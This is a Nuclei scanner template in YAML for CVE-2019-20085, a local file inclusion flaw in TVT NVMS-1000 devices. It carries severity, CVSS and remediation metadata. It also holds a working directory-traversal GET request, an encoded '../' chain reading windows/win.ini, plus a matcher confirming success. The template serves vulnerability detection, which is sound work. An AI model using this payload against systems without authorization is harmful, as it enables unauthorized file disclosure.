47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2019-20085
|
|
|
|
info:
|
|
name: TVT NVMS 1000 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48311
|
|
- https://www.exploit-db.com/exploits/47774
|
|
- http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-20085
|
|
cwe-id: CWE-22
|
|
epss-score: 0.69009
|
|
epss-percentile: 0.97678
|
|
cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: tvt
|
|
product: nvms-1000_firmware
|
|
tags: cve,cve2019,iot,lfi,kev,edb,packetstorm,tvt
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "\\[(font|extension|file)s\\]"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022016c45326216fd7f912bc9ec08ae6ffd68e1022070e772d1de1779a6aebd5edfd02201eb86b27f2069e0b762dce15d9601e9dbeb64435d585c982ad23db32a1bede85:922c64590222798bb761d5b6d8e72950 |